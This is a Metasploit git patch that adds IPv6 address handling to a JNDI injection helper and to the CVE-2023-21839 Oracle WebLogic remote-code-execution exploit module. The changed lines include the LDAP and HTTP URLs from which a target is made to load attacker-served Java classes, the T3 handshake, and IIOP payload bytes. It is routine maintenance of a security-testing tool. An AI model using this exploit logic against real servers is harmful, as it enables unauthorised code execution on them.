From 694c1006e41d90812f11c387fadc3707c8356521 Mon Sep 17 00:00:00 2001
From: Grant Willcox <gwillcox@rapid7.com>
Date: Fri, 9 Jun 2023 12:24:35 -0500
Subject: [PATCH] Add more IPv6 support in to the module

---
 Gemfile.lock                                  |  2 +-
 lib/msf/core/exploit/remote/jndi_injection.rb |  2 +-
 .../multi/iiop/cve_2023_21839_weblogic_rce.rb | 21 ++++++++-----------
 3 files changed, 11 insertions(+), 14 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index e7dfd60835..6acb2795da 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -384,7 +384,7 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.51)
+    rex-socket (0.1.52)
       rex-core
     rex-sslscan (0.1.9)
       rex-core
diff --git a/lib/msf/core/exploit/remote/jndi_injection.rb b/lib/msf/core/exploit/remote/jndi_injection.rb
index 468b9c5276..843cac6829 100644
--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@@ -29,7 +29,7 @@ module Exploit::Remote::JndiInjection
   # @return [String] the JNDI string
   def jndi_string(resource = nil)
     resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
-    "ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{resource}"
+    "ldap://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{resource}"
   end
 
   ## LDAP service callbacks
diff --git a/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb b/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
index 5b93099b92..a3307eca39 100644
--- a/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
+++ b/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
@@ -299,7 +299,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Want to just point this to the base of our install. WebLogic will append *CLASS NAME*.class to the end of
   # this URL when it tries to fetch the class to be loaded and instantiated.
   def ldap_url_string
-    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}/"
+    "http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['HTTP_SRVPORT'])}/"
   end
 
   #
@@ -334,14 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     netloc = opts['ServerHost'] || bindhost
     http_srvport = (opts['ServerPort'] || bindport).to_i
-    if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)
-      if Rex::Socket.is_ipv6?(netloc)
-        netloc = "[#{netloc}]:#{http_srvport}"
-      else
-        netloc = "#{netloc}:#{http_srvport}"
-      end
-    end
-    print_status("Serving Java code on: #{proto}://#{netloc}#{uopts['Path']}")
+    print_status("Serving Java code on: #{proto}://#{Rex::Socket.to_authority(netloc, http_srvport)}#{uopts['Path']}")
 
     # Add path to resource
     @service_path = uopts['Path']
@@ -404,6 +397,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Main Exploit
   def exploit
+    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
+      fail_with(Failure::BadConfig, 'SRVHOST must be set to a routable address!')
+    end
+
     if @version.blank?
       @version = get_weblogic_version
     end
@@ -411,7 +408,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Step 1 - Make T3 connection to start IIOP connection process, and read response.
     socket = connect
     print_status('1. Making T3 connection...')
-    socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
+    socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{Rex::Socket.to_authority(datastore['RHOST'], datastore['RPORT'])}\n\n")
     _buf = socket.get
     disconnect
     print_good('Made T3 connection!')
@@ -490,7 +487,7 @@ class MetasploitModule < Msf::Exploit::Remote
     key1 = locate_buf[foff...foff + 8]
     key2 = "\xff\xff\xff\xff" + locate_buf[foff + 4...foff + 8]
 
-    if @version.between?(Rex::Version.new('12.0.0.0.0'), Rex::Version.new('12.9999999.999999.999999.99999'))
+    if @version >= Rex::Version.new('12') && @version < Rex::Version.new('13')
       wls_key_1 = "\x00\x42\x45\x41\x08\x01\x03\x00\x00\x00\x00\x0c\x41\x64\x6d\x69\x6e\x53\x65\x72\x76\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x33\x49" \
                   "\x44\x4c\x3a\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d\x69\x6e\x67\x43" \
                   "\x6f\x6e\x74\x65\x78\x74\x41\x6e\x79\x3a\x31\x2e\x30\x00\x00\x00\x00\x00\x02\x38\x00\x00\x00\x00\x00\x00\x01\x42\x45\x41\x2c\x00\x00\x00\x10\x00" \
@@ -499,7 +496,7 @@ class MetasploitModule < Msf::Exploit::Remote
                   "\x44\x4c\x3a\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d\x69\x6e\x67\x43" \
                   "\x6f\x6e\x74\x65\x78\x74\x41\x6e\x79\x3a\x31\x2e\x30\x00\x00\x00\x00\x00\x04{{key3}}\x00\x00\x00\x01\x42\x45\x41\x2c\x00\x00\x00\x10\x00" \
                   "\x00\x00\x00\x00\x00\x00\x00{{key1}}"
-    elsif @version.between?(Rex::Version.new('14.0.0.0.0'), Rex::Version.new('14.9999999.999999.999999.99999'))
+    elsif @version >= Rex::Version.new('14') && @version < Rex::Version.new('15')
       wls_key_1 = "\x00\x42\x45\x41\x08\x01\x03\x00\x00\x00\x00\x0c\x41\x64" \
                   "\x6d\x69\x6e\x53\x65\x72\x76\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x33\x49\x44\x4c\x3a\x77\x65\x62\x6c" \
                   "\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d" \